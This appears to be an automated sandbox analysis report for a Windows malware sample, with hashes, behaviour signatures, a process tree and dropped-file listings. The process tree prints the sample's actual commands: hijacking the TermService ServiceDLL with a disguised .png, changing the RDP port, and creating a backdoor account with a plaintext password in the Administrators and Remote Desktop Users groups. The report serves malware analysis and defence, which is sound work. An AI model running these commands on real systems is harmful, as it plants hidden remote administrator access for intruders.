Analysis
-
max time kernel
38s -
max time network
110s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-11-2020 17:47
Static task
static1
Behavioral task
behavioral1
Sample
d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe
Resource
win10v20201028
General
-
Target
d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe
-
Size
3.1MB
-
MD5
c9cc3da6e84aedbd74218e5edea5d039
-
SHA1
f7b3f452245571dfe0906f417cf1cf1097d5cc44
-
SHA256
d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45
-
SHA512
fb33da351c2f8e68dfcf32f373f2894ef1fd7ad523aa85426231eaf5412d63a47a12ef078f3e56e124676d787f6d71139cec377fa60c7ba7ce255f5d4b18f7fe
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 3796 3796 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Windows directory 8 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 572 powershell.exe 572 powershell.exe 572 powershell.exe 2144 powershell.exe 2144 powershell.exe 2144 powershell.exe 3920 powershell.exe 3920 powershell.exe 3920 powershell.exe 2840 powershell.exe 2840 powershell.exe 2840 powershell.exe 572 powershell.exe 572 powershell.exe 572 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 636 636 -
Suspicious use of AdjustPrivilegeToken 67 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 572 powershell.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeDebugPrivilege 3920 powershell.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeIncreaseQuotaPrivilege 2144 powershell.exe Token: SeSecurityPrivilege 2144 powershell.exe Token: SeTakeOwnershipPrivilege 2144 powershell.exe Token: SeLoadDriverPrivilege 2144 powershell.exe Token: SeSystemProfilePrivilege 2144 powershell.exe Token: SeSystemtimePrivilege 2144 powershell.exe Token: SeProfSingleProcessPrivilege 2144 powershell.exe Token: SeIncBasePriorityPrivilege 2144 powershell.exe Token: SeCreatePagefilePrivilege 2144 powershell.exe Token: SeBackupPrivilege 2144 powershell.exe Token: SeRestorePrivilege 2144 powershell.exe Token: SeShutdownPrivilege 2144 powershell.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeSystemEnvironmentPrivilege 2144 powershell.exe Token: SeRemoteShutdownPrivilege 2144 powershell.exe Token: SeUndockPrivilege 2144 powershell.exe Token: SeManageVolumePrivilege 2144 powershell.exe Token: 33 2144 powershell.exe Token: 34 2144 powershell.exe Token: 35 2144 powershell.exe Token: 36 2144 powershell.exe Token: SeIncreaseQuotaPrivilege 2840 powershell.exe Token: SeSecurityPrivilege 2840 powershell.exe Token: SeTakeOwnershipPrivilege 2840 powershell.exe Token: SeLoadDriverPrivilege 2840 powershell.exe Token: SeSystemProfilePrivilege 2840 powershell.exe Token: SeSystemtimePrivilege 2840 powershell.exe Token: SeProfSingleProcessPrivilege 2840 powershell.exe Token: SeIncBasePriorityPrivilege 2840 powershell.exe Token: SeCreatePagefilePrivilege 2840 powershell.exe Token: SeBackupPrivilege 2840 powershell.exe Token: SeRestorePrivilege 2840 powershell.exe Token: SeShutdownPrivilege 2840 powershell.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeSystemEnvironmentPrivilege 2840 powershell.exe Token: SeRemoteShutdownPrivilege 2840 powershell.exe Token: SeUndockPrivilege 2840 powershell.exe Token: SeManageVolumePrivilege 2840 powershell.exe Token: 33 2840 powershell.exe Token: 34 2840 powershell.exe Token: 35 2840 powershell.exe Token: 36 2840 powershell.exe Token: SeIncreaseQuotaPrivilege 3920 powershell.exe Token: SeSecurityPrivilege 3920 powershell.exe Token: SeTakeOwnershipPrivilege 3920 powershell.exe Token: SeLoadDriverPrivilege 3920 powershell.exe Token: SeSystemProfilePrivilege 3920 powershell.exe Token: SeSystemtimePrivilege 3920 powershell.exe Token: SeProfSingleProcessPrivilege 3920 powershell.exe Token: SeIncBasePriorityPrivilege 3920 powershell.exe Token: SeCreatePagefilePrivilege 3920 powershell.exe Token: SeBackupPrivilege 3920 powershell.exe Token: SeRestorePrivilege 3920 powershell.exe Token: SeShutdownPrivilege 3920 powershell.exe Token: SeDebugPrivilege 3920 powershell.exe Token: SeSystemEnvironmentPrivilege 3920 powershell.exe Token: SeRemoteShutdownPrivilege 3920 powershell.exe Token: SeUndockPrivilege 3920 powershell.exe Token: SeManageVolumePrivilege 3920 powershell.exe Token: 33 3920 powershell.exe -
Suspicious use of WriteProcessMemory 70 IoCs
Processes:
d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 912 wrote to memory of 572 912 d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe powershell.exe PID 912 wrote to memory of 572 912 d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe powershell.exe PID 572 wrote to memory of 1348 572 powershell.exe csc.exe PID 572 wrote to memory of 1348 572 powershell.exe csc.exe PID 1348 wrote to memory of 2688 1348 csc.exe cvtres.exe PID 1348 wrote to memory of 2688 1348 csc.exe cvtres.exe PID 572 wrote to memory of 2144 572 powershell.exe powershell.exe PID 572 wrote to memory of 2144 572 powershell.exe powershell.exe PID 572 wrote to memory of 3920 572 powershell.exe powershell.exe PID 572 wrote to memory of 3920 572 powershell.exe powershell.exe PID 572 wrote to memory of 2840 572 powershell.exe powershell.exe PID 572 wrote to memory of 2840 572 powershell.exe powershell.exe PID 572 wrote to memory of 2264 572 powershell.exe reg.exe PID 572 wrote to memory of 2264 572 powershell.exe reg.exe PID 572 wrote to memory of 2176 572 powershell.exe reg.exe PID 572 wrote to memory of 2176 572 powershell.exe reg.exe PID 572 wrote to memory of 3092 572 powershell.exe reg.exe PID 572 wrote to memory of 3092 572 powershell.exe reg.exe PID 572 wrote to memory of 3644 572 powershell.exe net.exe PID 572 wrote to memory of 3644 572 powershell.exe net.exe PID 3644 wrote to memory of 3912 3644 net.exe net1.exe PID 3644 wrote to memory of 3912 3644 net.exe net1.exe PID 572 wrote to memory of 760 572 powershell.exe cmd.exe PID 572 wrote to memory of 760 572 powershell.exe cmd.exe PID 760 wrote to memory of 2740 760 cmd.exe cmd.exe PID 760 wrote to memory of 2740 760 cmd.exe cmd.exe PID 2740 wrote to memory of 3840 2740 cmd.exe net.exe PID 2740 wrote to memory of 3840 2740 cmd.exe net.exe PID 3840 wrote to memory of 2844 3840 net.exe net1.exe PID 3840 wrote to memory of 2844 3840 net.exe net1.exe PID 572 wrote to memory of 1060 572 powershell.exe cmd.exe PID 572 wrote to memory of 1060 572 powershell.exe cmd.exe PID 1060 wrote to memory of 800 1060 cmd.exe cmd.exe PID 1060 wrote to memory of 800 1060 cmd.exe cmd.exe PID 800 wrote to memory of 4036 800 cmd.exe net.exe PID 800 wrote to memory of 4036 800 cmd.exe net.exe PID 4036 wrote to memory of 516 4036 net.exe net1.exe PID 4036 wrote to memory of 516 4036 net.exe net1.exe PID 2776 wrote to memory of 2840 2776 cmd.exe net.exe PID 2776 wrote to memory of 2840 2776 cmd.exe net.exe PID 2840 wrote to memory of 1352 2840 net.exe net1.exe PID 2840 wrote to memory of 1352 2840 net.exe net1.exe PID 1772 wrote to memory of 2208 1772 cmd.exe net.exe PID 1772 wrote to memory of 2208 1772 cmd.exe net.exe PID 2208 wrote to memory of 228 2208 net.exe net1.exe PID 2208 wrote to memory of 228 2208 net.exe net1.exe PID 4080 wrote to memory of 3980 4080 cmd.exe net.exe PID 4080 wrote to memory of 3980 4080 cmd.exe net.exe PID 3980 wrote to memory of 2844 3980 net.exe net1.exe PID 3980 wrote to memory of 2844 3980 net.exe net1.exe PID 3952 wrote to memory of 652 3952 cmd.exe net.exe PID 3952 wrote to memory of 652 3952 cmd.exe net.exe PID 652 wrote to memory of 3788 652 net.exe net1.exe PID 652 wrote to memory of 3788 652 net.exe net1.exe PID 1604 wrote to memory of 2776 1604 cmd.exe net.exe PID 1604 wrote to memory of 2776 1604 cmd.exe net.exe PID 2776 wrote to memory of 1032 2776 net.exe net1.exe PID 2776 wrote to memory of 1032 2776 net.exe net1.exe PID 2536 wrote to memory of 2264 2536 cmd.exe net.exe PID 2536 wrote to memory of 2264 2536 cmd.exe net.exe PID 2264 wrote to memory of 1212 2264 net.exe net1.exe PID 2264 wrote to memory of 1212 2264 net.exe net1.exe PID 572 wrote to memory of 2844 572 powershell.exe cmd.exe PID 572 wrote to memory of 2844 572 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe"C:\Users\Admin\AppData\Local\Temp\d7455594c0ced8e888154a84944219cbc6f0824e46450b69bb8413616dd07d45.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gviksms1\gviksms1.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B81.tmp" "c:\Users\Admin\AppData\Local\Temp\gviksms1\CSC95561934605341159D384D8599A7156.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc X1x9MXvy /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc X1x9MXvy /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc X1x9MXvy /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc X1x9MXvy1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc X1x9MXvy2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc X1x9MXvy3⤵
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES6B81.tmpMD5
09f2d573c2bfa764b4ed824e2d2a1aa3
SHA14427dcc41ec426a091bfa4a99fceaa51b2e1b122
SHA256e8a62d26983e305cde547fbf03408940f563fa7b04f12f3448372e5451ff6e12
SHA512621850beb6187b775a4a91e458f915c5db575d32ef16d1e1c56db97ccc0f2db0757e39c20b2a3b6f4529b5137bd2f5ced7db8b12c9d37bdfb3454a13b92632d7
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
41d1a9d1cbee90f1e5f27fdfb299f8b8
SHA11e9ac27006a7c364649265246fccbd719418ceab
SHA2560f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4
SHA512f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422
-
C:\Users\Admin\AppData\Local\Temp\gviksms1\gviksms1.dllMD5
02596fef0c68550c59071f6b0fa276db
SHA11327e49fbf466212c80d1e8837752c9c44565aeb
SHA2561b3d2c99a3236b89486659c2cfa43a2d4606a24fa881f9459ec501756823fa58
SHA512d9f82ab026facd113cbb27e44247467e7bb98924ddc2a16e2c1e1e396323e4b0674d7a768bd5690db927d7bc4b03ce0afd6dd9a4152243acabc41302c7900776
-
\??\c:\Users\Admin\AppData\Local\Temp\gviksms1\CSC95561934605341159D384D8599A7156.TMPMD5
8ba7e1ce7b66489e234b9ff3898ce848
SHA1fb3eab726c3c8cbbfb5c03c3a35af4f0ba6701d4
SHA256ba23541c0f96e23ecc92a8fe0cef54837ea4ede2e2c10751afb462d05f140439
SHA512da7ba292c6413b7dbdc7d10ad1c5ec3ab7b22d12a7e0cc2e366e5ca1450e014b35cc8bac7df857875ad3f938c8ee4154a5f673b27a65f09dea8e95a483e6c171
-
\??\c:\Users\Admin\AppData\Local\Temp\gviksms1\gviksms1.0.csMD5
8e55cb0ca998472ab6d3e295e0c4dd50
SHA1407d07a29b89fc3afc246c0680d5857e3f51019d
SHA25663e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685
SHA512c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28
-
\??\c:\Users\Admin\AppData\Local\Temp\gviksms1\gviksms1.cmdlineMD5
144e26476cced02b91bb5e6544a6ac72
SHA1c03936e7b4425a50102230a9db0c33e465f0bee0
SHA256215cc9d337f01ca6a52ab9a6d8a8715693db7fd7f72a7965a07e6c49fa6bed29
SHA512fd5f685ffa13818d08d5601bc6bef84960a8580338a9db625723c01a61bc4ba0c2e6b5612e0a98da2e046e16c3c5cf5a422a715e171cc2c24841ebfeb9ab8217
-
\Windows\Branding\mediasrv.pngMD5
37fb7ba711ffbe9d6ebb27d54e827966
SHA14d4d9303e011bcb14720b24239a1aacd58122f47
SHA25681b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5
SHA5123f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf
-
\Windows\Branding\mediasvc.pngMD5
2f916498a393e2f0d008d33a74c062ba
SHA1404d52d4253ef3843ae3f2c4aff050f37fcd3f08
SHA256d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412
SHA512d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10
-
memory/228-48-0x0000000000000000-mapping.dmp
-
memory/516-42-0x0000000000000000-mapping.dmp
-
memory/572-17-0x00000179A05F0000-0x00000179A05F1000-memory.dmpFilesize
4KB
-
memory/572-3-0x00007FF8FDFB0000-0x00007FF8FE99C000-memory.dmpFilesize
9.9MB
-
memory/572-5-0x00000179FEA50000-0x00000179FEA51000-memory.dmpFilesize
4KB
-
memory/572-6-0x00000179FEFA0000-0x00000179FEFA1000-memory.dmpFilesize
4KB
-
memory/572-15-0x0000017998000000-0x0000017998001000-memory.dmpFilesize
4KB
-
memory/572-16-0x00000179A0260000-0x00000179A0261000-memory.dmpFilesize
4KB
-
memory/572-2-0x0000000000000000-mapping.dmp
-
memory/572-4-0x00000179FC3E0000-0x00000179FC3E1000-memory.dmpFilesize
4KB
-
memory/652-51-0x0000000000000000-mapping.dmp
-
memory/760-35-0x0000000000000000-mapping.dmp
-
memory/760-59-0x0000000000000000-mapping.dmp
-
memory/800-40-0x0000000000000000-mapping.dmp
-
memory/912-1-0x0000000000DC0000-0x0000000000DC1000-memory.dmpFilesize
4KB
-
memory/1032-54-0x0000000000000000-mapping.dmp
-
memory/1060-39-0x0000000000000000-mapping.dmp
-
memory/1212-56-0x0000000000000000-mapping.dmp
-
memory/1348-8-0x0000000000000000-mapping.dmp
-
memory/1352-46-0x0000000000000000-mapping.dmp
-
memory/2132-60-0x0000000000000000-mapping.dmp
-
memory/2144-19-0x00007FF8FDFB0000-0x00007FF8FE99C000-memory.dmpFilesize
9.9MB
-
memory/2144-18-0x0000000000000000-mapping.dmp
-
memory/2176-31-0x0000000000000000-mapping.dmp
-
memory/2208-47-0x0000000000000000-mapping.dmp
-
memory/2264-30-0x0000000000000000-mapping.dmp
-
memory/2264-55-0x0000000000000000-mapping.dmp
-
memory/2616-58-0x0000000000000000-mapping.dmp
-
memory/2688-11-0x0000000000000000-mapping.dmp
-
memory/2740-36-0x0000000000000000-mapping.dmp
-
memory/2776-53-0x0000000000000000-mapping.dmp
-
memory/2840-45-0x0000000000000000-mapping.dmp
-
memory/2840-27-0x00007FF8FDFB0000-0x00007FF8FE99C000-memory.dmpFilesize
9.9MB
-
memory/2840-25-0x0000000000000000-mapping.dmp
-
memory/2844-38-0x0000000000000000-mapping.dmp
-
memory/2844-50-0x0000000000000000-mapping.dmp
-
memory/2844-57-0x0000000000000000-mapping.dmp
-
memory/3092-32-0x0000000000000000-mapping.dmp
-
memory/3644-33-0x0000000000000000-mapping.dmp
-
memory/3788-52-0x0000000000000000-mapping.dmp
-
memory/3840-37-0x0000000000000000-mapping.dmp
-
memory/3912-34-0x0000000000000000-mapping.dmp
-
memory/3920-23-0x00007FF8FDFB0000-0x00007FF8FE99C000-memory.dmpFilesize
9.9MB
-
memory/3920-21-0x0000000000000000-mapping.dmp
-
memory/3980-49-0x0000000000000000-mapping.dmp
-
memory/4036-41-0x0000000000000000-mapping.dmp